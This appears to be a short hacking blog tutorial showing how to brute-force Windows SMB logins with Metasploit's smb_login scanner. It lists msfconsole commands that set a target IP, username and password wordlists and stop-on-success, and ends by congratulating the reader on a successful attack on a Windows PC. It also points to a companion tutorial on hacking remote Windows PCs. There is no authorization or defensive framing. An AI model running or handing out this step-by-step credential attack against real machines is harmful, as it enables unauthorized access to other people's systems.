A common situation to find yourself in is being in possession of a valid username and password combination, and wondering where else you can use it. This is where the SMB Login Check Scanner can be very useful, as it will connect to a range of hosts and determine if the username/password combination can access the target.
Metasploits smb_login module will attempt to login via SMB across a provided range of IP addresses. If you have a database plugin loaded, successful logins will be stored in it for future reference and usage.
before this article,we recommend to you must read our
Hack Remote Windows PC using Script Web Delivery
It assumes that you already have MetaSploit installed, or that you are running Kali / backtrack Linux. if not Installed,you can download from here https://www.metasploit.com/
Step 1 : Save randomly generated Users as User.txt file at Desktop
Step 2 : Save randomly generated passwords as Pass.txt file at Desktop
Step 3 : Open MetaSploit by using command msfconsole
Step 4 :
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary (smb_login)>options
Step 5 :
msf auxiliary (smb_login)>set rhosts 192.168.18.129 [Target I.P]
msf auxiliary (smb_login)>set stop_on_success true
msf auxiliary (smb_login)>set user_file /root/Desktop/User.txt
msf auxiliary (smb_login)>set pass_file /root/Desktop/Pass.txt
msf auxiliary (smb_login)>run
Step 6 : Greate ! you have sucessfully bruteforce attack on windows pc using Smb login exploit